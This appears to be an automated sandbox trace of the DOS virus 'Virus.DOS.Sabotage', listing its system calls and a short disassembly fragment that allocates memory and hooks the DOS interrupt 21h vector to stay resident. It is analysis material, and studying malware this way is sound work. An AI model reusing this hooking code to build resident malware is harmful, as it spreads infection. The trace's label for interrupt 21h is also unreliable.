Sample viewer

vx.netlux.org/Virus.DOS.Sabotage

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:59:10.50403009Z 102 PC: 186ab | Get or set code page
2018-12-17T22:59:10.508012731Z 44 PC: 186b4 | Get time 0x186b4: cmp dl, 7
0x186b7: ja 0x186bc
0x186b9: jmp 0x1883e
0x186bc: mov ah, 0x4a
0x186be: mov bx, 0xffff
0x186c1: int 0x21
0x186c3: sub bx, 0x20
0x186c6: nop
0x186c7: mov ah, 0x4a
0x186c9: int 0x21
0x186cb: mov ah, 0x48
0x186cd: mov bx, 0x1f
0x186d0: int 0x21
0x186d2: jb 0x1870b
0x186d4: dec ax
0x186d5: mov es, ax
0x186d7: mov word ptr es:[1], 8
0x186de: push ax
0x186df: mov ax, 0x3521
0x186e2: int 0x21
2018-12-17T22:59:10.510467632Z 74 PC: 186c3 | Reallocate memory
2018-12-17T22:59:10.512147086Z 74 PC: 186cb | Reallocate memory
2018-12-17T22:59:10.514009531Z 72 PC: 186d2 | Allocate memory
2018-12-17T22:59:10.515781512Z 53 PC: 186e4 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:59:10.517256991Z 37 PC: 1870b | Set interrupt vector (Interrupt = '33' AKA 'Random read')